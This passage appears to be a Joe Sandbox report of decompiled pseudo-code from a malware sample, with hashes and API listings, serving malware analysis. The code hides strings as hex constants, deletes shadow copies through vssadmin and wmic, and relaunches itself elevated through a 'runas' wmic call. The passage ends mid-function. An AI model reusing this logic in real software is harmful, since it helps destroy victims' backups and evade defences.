                                      • Opcode Fuzzy Hash: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
                                      • Instruction Fuzzy Hash: 60318F71A00219ABDF10AF65DD84AAE77B8EF44314B0584B7F806F7291DB389E50CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 35%
                                      			E00402F50(WCHAR* __ecx) {
                                      				unsigned int _v8;
                                      				char _v12;
                                      				WCHAR* _v16;
                                      				short _v2064;
                                      				long _t17;
                                      				void* _t18;
                                      				WCHAR* _t23;
                                      				unsigned int _t31;
                                      				void* _t35;
                                      				intOrPtr* _t39;
                                      				signed int _t40;
                                      
                                      				_t39 = __imp__EnumDeviceDrivers;
                                      				_v16 = __ecx;
                                      				_v8 = 0;
                                      				 *_t39( &_v12, 4,  &_v8);
                                      				_t17 = _v8;
                                      				if(_t17 != 0) {
                                      					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
                                      					_t35 = _t18;
                                      					if(_t35 != 0) {
                                      						_push( &_v12);
                                      						_push(_v8);
                                      						_push(_t35);
                                      						if( *_t39() == 0) {
                                      							L10:
                                      							VirtualFree(_t35, 0, 0x8000);
                                      							return 0;
                                      						} else {
                                      							_t40 = 0;
                                      							_t31 = _v8 >> 2;
                                      							if(_t31 <= 0) {
                                      								goto L10;
                                      							} else {
                                      								while(1) {
                                      									_t23 =  &_v2064;
                                      									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
                                      									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
                                      										break;
                                      									}
                                      									_t40 = _t40 + 1;
                                      									if(_t40 < _t31) {
                                      										continue;
                                      									} else {
                                      										goto L10;
                                      									}
                                      									goto L12;
                                      								}
                                      								VirtualFree(_t35, 0, 0x8000);
                                      								return 1;
                                      							}
                                      						}
                                      					} else {
                                      						return _t18;
                                      					}
                                      				} else {
                                      					return _t17;
                                      				}
                                      				L12:
                                      			}














                                      0x00402f5a
                                      0x00402f69
                                      0x00402f6d
                                      0x00402f74
                                      0x00402f76
                                      0x00402f7b
                                      0x00402f8d
                                      0x00402f93
                                      0x00402f97
                                      0x00402fa3
                                      0x00402fa4
                                      0x00402fa7
                                      0x00402fac
                                      0x00402ff2
                                      0x00402ffa
                                      0x00403008
                                      0x00402fae
                                      0x00402fb1
                                      0x00402fb3
                                      0x00402fb8
                                      0x00000000
                                      0x00402fc0
                                      0x00402fc0
                                      0x00402fc5
                                      0x00402fcf
                                      0x00402fd7
                                      0x00000000
                                      0x00000000
                                      0x00402fed
                                      0x00402ff0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402ff0
                                      0x00403011
                                      0x00403022
                                      0x00403022
                                      0x00402fb8
                                      0x00402f99
                                      0x00402f9e
                                      0x00402f9e
                                      0x00402f81
                                      0x00402f81
                                      0x00402f81
                                      0x00000000

                                      APIs
                                      • EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00402F74
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocDeviceDriversEnumVirtual
                                      • String ID:
                                      • API String ID: 4140748134-0
                                      • Opcode ID: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
                                      • Instruction ID: ae1065d34e0a9f40daa088a41d748c469a9f576a3d92cbe81eb507f1f3ca9255
                                      • Opcode Fuzzy Hash: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
                                      • Instruction Fuzzy Hash: 9621A43260011AABEB109B989D89FAAB7BCEB44715F1001B6EE04E61D0D7B19D05AB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 227 4077f0-4079db InternetOpenW 228 4079f2-4079f8 227->228 229 4079dd-4079ef InternetOpenW 227->229 229->228
                                      C-Code - Quality: 100%
                                      			E004077F0(void* __ecx) {
                                      				short _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				intOrPtr _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				intOrPtr _v112;
                                      				intOrPtr _v116;
                                      				intOrPtr _v120;
                                      				intOrPtr _v124;
                                      				intOrPtr _v128;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				intOrPtr _v140;
                                      				intOrPtr _v144;
                                      				intOrPtr _v148;
                                      				intOrPtr _v152;
                                      				intOrPtr _v156;
                                      				intOrPtr _v160;
                                      				intOrPtr _v164;
                                      				intOrPtr _v168;
                                      				intOrPtr _v172;
                                      				intOrPtr _v176;
                                      				intOrPtr _v180;
                                      				intOrPtr _v184;
                                      				intOrPtr _v188;
                                      				intOrPtr _v192;
                                      				intOrPtr _v196;
                                      				intOrPtr _v200;
                                      				intOrPtr _v204;
                                      				intOrPtr _v208;
                                      				intOrPtr _v212;
                                      				intOrPtr _v216;
                                      				intOrPtr _v220;
                                      				short _v224;
                                      				WCHAR* _t62;
                                      				void* _t64;
                                      
                                      				_v8 = 0;
                                      				_v224 = 0x6f004d;
                                      				_v220 = 0x69007a;
                                      				_v216 = 0x6c006c;
                                      				_v212 = 0x2f0061;
                                      				_v208 = 0x2e0035;
                                      				_v204 = 0x200030;
                                      				_v200 = 0x570028;
                                      				_v196 = 0x6e0069;
                                      				_v192 = 0x6f0064;
                                      				_v188 = 0x730077;
                                      				_v184 = 0x4e0020;
                                      				_v180 = 0x200054;
                                      				_v176 = 0x2e0036;
                                      				_v172 = 0x3b0031;
                                      				_v168 = 0x570020;
                                      				_v164 = 0x57004f;
                                      				_v160 = 0x340036;
                                      				_v156 = 0x200029;
                                      				_v152 = 0x700041;
                                      				_v148 = 0x6c0070;
                                      				_v144 = 0x570065;
                                      				_v140 = 0x620065;
                                      				_v136 = 0x69004b;
                                      				_v132 = 0x2f0074;
                                      				_v128 = 0x330035;
                                      				_v124 = 0x2e0037;
                                      				_v120 = 0x360033;
                                      				_v116 = 0x280020;
                                      				_v112 = 0x48004b;
                                      				_v108 = 0x4d0054;
                                      				_v104 = 0x2c004c;
                                      				_v100 = 0x6c0020;
                                      				_v96 = 0x6b0069;
                                      				_v92 = 0x200065;
                                      				_v88 = 0x650047;
                                      				_v84 = 0x6b0063;
                                      				_v80 = 0x29006f;
                                      				_v76 = 0x430020;
                                      				_v72 = 0x720068;
                                      				_v68 = 0x6d006f;
                                      				_v64 = 0x2f0065;
                                      				_v60 = 0x350035;
                                      				_v56 = 0x30002e;
                                      				_v52 = 0x32002e;
                                      				_v48 = 0x380038;
                                      				_v44 = 0x2e0033;
                                      				_v40 = 0x370038;
                                      				_v36 = 0x530020;
                                      				_v32 = 0x660061;
                                      				_v28 = 0x720061;
                                      				_v24 = 0x2f0069;
                                      				_v20 = 0x330035;
                                      				_v16 = 0x2e0037;
                                      				_v12 = 0x360033;
                                      				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
                                      				 *(__ecx + 4) = _t62;
                                      				if(_t62 == 0) {
                                      					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
                                      					 *(__ecx + 4) = _t64;
                                      					return _t64;
                                      				}
                                      				return _t62;
                                      			}




























































                                      0x00407808
                                      0x00407814
                                      0x0040781f
                                      0x00407829
                                      0x00407833
                                      0x0040783d
                                      0x00407847
                                      0x00407851
                                      0x0040785b
                                      0x00407865
                                      0x0040786f
                                      0x00407879
                                      0x00407883
                                      0x0040788d
                                      0x00407897
                                      0x004078a1
                                      0x004078ab
                                      0x004078b5
                                      0x004078bf
                                      0x004078c9
                                      0x004078d3
                                      0x004078dd
                                      0x004078e7
                                      0x004078f1
                                      0x004078fb
                                      0x00407902
                                      0x00407909
                                      0x00407910
                                      0x00407917
                                      0x0040791e
                                      0x00407925
                                      0x0040792c
                                      0x00407933
                                      0x0040793a
                                      0x00407941
                                      0x00407948
                                      0x0040794f
                                      0x00407956
                                      0x0040795d
                                      0x00407964
                                      0x0040796b
                                      0x00407972
                                      0x00407979
                                      0x00407980
                                      0x00407987
                                      0x0040798e
                                      0x00407995
                                      0x0040799c
                                      0x004079a3
                                      0x004079aa
                                      0x004079b1
                                      0x004079b8
                                      0x004079bf
                                      0x004079c6
                                      0x004079cd
                                      0x004079d4
                                      0x004079d6
                                      0x004079db
                                      0x004079ed
                                      0x004079ef
                                      0x00000000
                                      0x004079ef
                                      0x004079f8

                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
                                      • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                      • API String ID: 2038078732-2805935662
                                      • Opcode ID: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
                                      • Instruction ID: 8ec0cbb63084930b06e9c442bfdedbe0f88dfa63fe684bf69a99aafbe0ca1518
                                      • Opcode Fuzzy Hash: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
                                      • Instruction Fuzzy Hash: 0541A8B4811369DEEB21CF91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 303 404330-404346 call 403ae0 306 4043e0-4044cd 303->306 307 40434c-4043db 303->307 308 4044d8-4044f9 VirtualAlloc 306->308 307->308 309 4044fb-4044fd 308->309 310 4044ff-40452d GetSystemDirectoryW lstrcatW ShellExecuteW 308->310 311 40452f-404545 VirtualFree 309->311 310->311
                                      C-Code - Quality: 97%
                                      			E00404330(void* __eflags) {
                                      				short _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				char _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				intOrPtr _v112;
                                      				intOrPtr _v116;
                                      				char _v120;
                                      				short _v124;
                                      				intOrPtr _v128;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				intOrPtr _v140;
                                      				intOrPtr _v144;
                                      				intOrPtr _v148;
                                      				char _v152;
                                      				short _v156;
                                      				intOrPtr _v160;
                                      				intOrPtr _v164;
                                      				intOrPtr _v168;
                                      				char _v172;
                                      				short* _v176;
                                      				short* _t51;
                                      				WCHAR* _t59;
                                      				void* _t62;
                                      				signed int _t66;
                                      				void* _t69;
                                      
                                      				if(E00403AE0(_t62) == 0) {
                                      					_v172 = 0x63005c;
                                      					_v168 = 0x64006d;
                                      					_v8 = 0;
                                      					_t59 =  &_v172;
                                      					_v164 = 0x65002e;
                                      					_t51 =  &_v84;
                                      					_v160 = 0x650078;
                                      					_v156 = 0;
                                      					_v84 = 0x63002f;
                                      					_v80 = 0x760020;
                                      					_v76 = 0x730073;
                                      					_v72 = 0x640061;
                                      					_v68 = 0x69006d;
                                      					_v64 = 0x20006e;
                                      					_v60 = 0x650064;
                                      					_v56 = 0x65006c;
                                      					_v52 = 0x650074;
                                      					_v48 = 0x730020;
                                      					_v44 = 0x610068;
                                      					_v40 = 0x6f0064;
                                      					_v36 = 0x730077;
                                      					_v32 = 0x2f0020;
                                      					_v28 = 0x6c0061;
                                      					_v24 = 0x20006c;
                                      					_v20 = 0x71002f;
                                      					_v16 = 0x690075;
                                      					_v12 = 0x740065;
                                      				} else {
                                      					_v152 = 0x77005c;
                                      					_v148 = 0x650062;
                                      					_t59 =  &_v152;
                                      					_v144 = 0x5c006d;
                                      					_t51 =  &_v120;
                                      					_v140 = 0x6d0077;
                                      					_v136 = 0x630069;
                                      					_v132 = 0x65002e;
                                      					_v128 = 0x650078;
                                      					_v124 = 0;
                                      					_v120 = 0x680073;
                                      					_v116 = 0x640061;
                                      					_v112 = 0x77006f;
                                      					_v108 = 0x6f0063;
                                      					_v104 = 0x790070;
                                      					_v100 = 0x640020;
                                      					_v96 = 0x6c0065;
                                      					_v92 = 0x740065;
                                      					_v88 = 0x65;
                                      				}
                                      				_v176 = _t51;
                                      				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
                                      				if(_t69 != 0) {
                                      					GetSystemDirectoryW(_t69, 0x100);
                                      					lstrcatW(_t69, _t59);
                                      					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
                                      					asm("sbb edi, edi");
                                      					_t66 =  ~0x20;
                                      				} else {
                                      					_t66 = 0;
                                      				}
                                      				VirtualFree(_t69, 0, 0x8000);
                                      				return _t66;
                                      			}



















































                                      0x00404346
                                      0x004043e2
                                      0x004043ec
                                      0x004043f4
                                      0x004043fc
                                      0x00404400
                                      0x00404408
                                      0x0040440c
                                      0x00404414
                                      0x00404419
                                      0x00404421
                                      0x00404429
                                      0x00404431
                                      0x00404439
                                      0x00404441
                                      0x00404449
                                      0x00404454
                                      0x0040445f
                                      0x0040446a
                                      0x00404475
                                      0x00404480
                                      0x0040448b
                                      0x00404496
                                      0x004044a1
                                      0x004044ac
                                      0x004044b7
                                      0x004044c2
                                      0x004044cd
                                      0x0040434c
                                      0x0040434e
                                      0x00404356
                                      0x0040435e
                                      0x00404362
                                      0x0040436a
                                      0x0040436e
                                      0x00404376
                                      0x0040437e
                                      0x00404386
                                      0x0040438e
                                      0x00404393
                                      0x0040439b
                                      0x004043a3
                                      0x004043ab
                                      0x004043b3
                                      0x004043bb
                                      0x004043c3
                                      0x004043cb
                                      0x004043d3
                                      0x004043d3
                                      0x004044e6
                                      0x004044f5
                                      0x004044f9
                                      0x00404505
                                      0x0040450d
                                      0x00404523
                                      0x0040452b
                                      0x0040452d
                                      0x004044fb
                                      0x004044fb
                                      0x004044fb
                                      0x00404537
                                      0x00404545

                                      APIs
                                        • Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
                                        • Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 004044EF
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 00404505
                                      • lstrcatW.KERNEL32(00000000,0063005C), ref: 0040450D
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 00404523
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404537
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                      • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                      • API String ID: 2684037697-4098772853
                                      • Opcode ID: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
                                      • Instruction ID: b655391ad336c4b4d1e3433ef327ff3d08d390bc764b3395417c8c24b6d0b817
                                      • Opcode Fuzzy Hash: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
                                      • Instruction Fuzzy Hash: 7D41FAB0248380DFE3208F119949B5BBEE6BBC5B49F10491DE6985A291C7F6854CCF9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E00403BA0(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v1020;
                                      				short _v1028;
                                      				char _v1532;
                                      				short _v1540;
                                      				intOrPtr _v1548;
                                      				intOrPtr _v1552;
                                      				intOrPtr _v1556;
                                      				intOrPtr _v1560;
                                      				intOrPtr _v1564;
                                      				intOrPtr _v1568;
                                      				intOrPtr _v1572;
                                      				intOrPtr _v1576;
                                      				intOrPtr _v1580;
                                      				intOrPtr _v1584;
                                      				intOrPtr _v1588;
                                      				intOrPtr _v1592;
                                      				intOrPtr _v1596;
                                      				intOrPtr _v1600;
                                      				intOrPtr _v1604;
                                      				intOrPtr _v1608;
                                      				intOrPtr _v1612;
                                      				intOrPtr _v1616;
                                      				short _v1620;
                                      				intOrPtr _v1624;
                                      				intOrPtr _v1628;
                                      				intOrPtr _v1632;
                                      				intOrPtr _v1636;
                                      				intOrPtr _v1640;
                                      				intOrPtr _v1644;
                                      				intOrPtr _v1648;
                                      				intOrPtr _v1652;
                                      				intOrPtr _v1656;
                                      				intOrPtr _v1660;
                                      				intOrPtr _v1664;
                                      				intOrPtr _v1668;
                                      				intOrPtr _v1672;
                                      				short _v1676;
                                      				char _v1680;
                                      				int _t54;
                                      				struct HWND__* _t62;
                                      				long _t66;
                                      				void* _t76;
                                      				void* _t78;
                                      				void* _t80;
                                      
                                      				_t78 = __ecx;
                                      				_t54 = E00403AE0(__edx);
                                      				if(_t54 != 0) {
                                      					_t54 = E00403A60();
                                      					if(_t54 == 0) {
                                      						_v1676 = 0x770025;
                                      						_v1672 = 0x6e0069;
                                      						_v1668 = 0x690064;
                                      						_v1664 = 0x250072;
                                      						_v1660 = 0x73005c;
                                      						_v1656 = 0x730079;
                                      						_v1652 = 0x650074;
                                      						_v1648 = 0x33006d;
                                      						_v1644 = 0x5c0032;
                                      						_v1640 = 0x620077;
                                      						_v1636 = 0x6d0065;
                                      						_v1632 = 0x77005c;
                                      						_v1628 = 0x69006d;
                                      						_v1624 = 0x63;
                                      						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
                                      						_v1620 = 0x720070;
                                      						_v1616 = 0x63006f;
                                      						_v1612 = 0x730065;
                                      						_v1608 = 0x200073;
                                      						_v1604 = 0x610063;
                                      						_v1600 = 0x6c006c;
                                      						_v1596 = 0x630020;
                                      						_v1592 = 0x650072;
                                      						_v1588 = 0x740061;
                                      						_v1584 = 0x200065;
                                      						_v1580 = 0x630022;
                                      						_v1576 = 0x64006d;
                                      						_v1572 = 0x2f0020;
                                      						_v1568 = 0x200063;
                                      						_v1564 = 0x740073;
                                      						_v1560 = 0x720061;
                                      						_v1556 = 0x200074;
                                      						_v1552 = 0x730025;
                                      						_v1548 = 0x22;
                                      						wsprintfW( &_v1028,  &_v1620, _t78);
                                      						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
                                      						 *_t76 = 0x3c;
                                      						 *(_t76 + 4) = 0x40;
                                      						_t62 = GetForegroundWindow();
                                      						_t80 = 0;
                                      						 *(_t76 + 8) = _t62;
                                      						_v1680 = 0x750072;
                                      						_v1676 = 0x61006e;
                                      						_v1672 = 0x73;
                                      						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
                                      						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
                                      						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
                                      						 *(_t76 + 0x18) = 0;
                                      						 *(_t76 + 0x1c) = 0;
                                      						 *(_t76 + 0x20) = 0;
                                      						while(1) {
                                      							_t66 = ShellExecuteExW(_t76);
                                      							if(_t66 != 0) {
                                      								break;
                                      							}
                                      							_t80 = _t80 + 1;
                                      							if(_t80 < 0x64) {
                                      								continue;
                                      							}
                                      							_t54 = VirtualFree(_t76, _t66, 0x8000);
                                      							goto L6;
                                      						}
                                      						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
                                      						CloseHandle( *(_t76 + 0x38));
                                      						ExitProcess(0);
                                      					}
                                      				}
                                      				L6:
                                      				return _t54;
                                      			}















































                                      0x00403baf
                                      0x00403bb1
                                      0x00403bb8
                                      0x00403bbe
                                      0x00403bc5
                                      0x00403bd7
                                      0x00403be4
                                      0x00403bed
                                      0x00403bf5
                                      0x00403bfd
                                      0x00403c05
                                      0x00403c0d
                                      0x00403c15
                                      0x00403c1d
                                      0x00403c25
                                      0x00403c2d
                                      0x00403c35
                                      0x00403c3d
                                      0x00403c45
                                      0x00403c4d
                                      0x00403c58
                                      0x00403c68
                                      0x00403c71
                                      0x00403c79
                                      0x00403c81
                                      0x00403c89
                                      0x00403c91
                                      0x00403c99
                                      0x00403ca1
                                      0x00403ca9
                                      0x00403cb4
                                      0x00403cbf
                                      0x00403cca
                                      0x00403cd5
                                      0x00403ce0
                                      0x00403ceb
                                      0x00403cf6
                                      0x00403d01
                                      0x00403d0c
                                      0x00403d17
                                      0x00403d31
                                      0x00403d33
                                      0x00403d39
                                      0x00403d40
                                      0x00403d4c
                                      0x00403d4e
                                      0x00403d55
                                      0x00403d5d
                                      0x00403d65
                                      0x00403d6d
                                      0x00403d77
                                      0x00403d81
                                      0x00403d84
                                      0x00403d8b
                                      0x00403d92
                                      0x00403da0
                                      0x00403da1
                                      0x00403da5
                                      0x00000000
                                      0x00000000
                                      0x00403da7
                                      0x00403dab
                                      0x00000000
                                      0x00000000
                                      0x00403db4
                                      0x00000000
                                      0x00403db4
                                      0x00403dc6
                                      0x00403dcf
                                      0x00403dd7
                                      0x00403dd7
                                      0x00403bc5
                                      0x00403dba
                                      0x00403dc0

                                      APIs
                                        • Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
                                        • Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85
                                        • Part of subcall function 00403A60: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403C4D
                                      • wsprintfW.USER32 ref: 00403D17
                                      • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 00403D2B
                                      • GetForegroundWindow.USER32 ref: 00403D40
                                      • ShellExecuteExW.SHELL32(00000000), ref: 00403DA1
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403DB4
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403DC6
                                      • CloseHandle.KERNEL32(?), ref: 00403DCF
                                      • ExitProcess.KERNEL32 ref: 00403DD7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                      • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                      • API String ID: 561366689-3790645798
                                      • Opcode ID: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
                                      • Instruction ID: cc7589b939d66cedc96280ec9e713ba096b07f437b5f45324ccf50025119f88d
                                      • Opcode Fuzzy Hash: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
                                      • Instruction Fuzzy Hash: FF515CB0108341DFE3208F11C94878BBFF9BF84749F00492DE5989A292D7FA9558CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 94%
                                      			E00402960(char* __ecx, void* __eflags) {
                                      				void* _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				short _v32;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				intOrPtr _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				intOrPtr _v112;
                                      				intOrPtr _v116;
                                      				intOrPtr _v120;
                                      				intOrPtr _v124;
                                      				intOrPtr _v128;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				short _v140;
                                      				int _t47;
                                      				char* _t58;
                                      
                                      				_t58 = __ecx;
                                      				_v32 = 0x520050;
                                      				_v28 = 0x440049;
                                      				_push(0x41);
                                      				_v24 = 0x520055;
                                      				_v20 = 0x530041;
                                      				_v16 = 0x4b0048;
                                      				_v12 = 0x41;
                                      				E00407C60( &_v32, lstrlenW( &_v32));
                                      				_v140 = 0x4f0053;
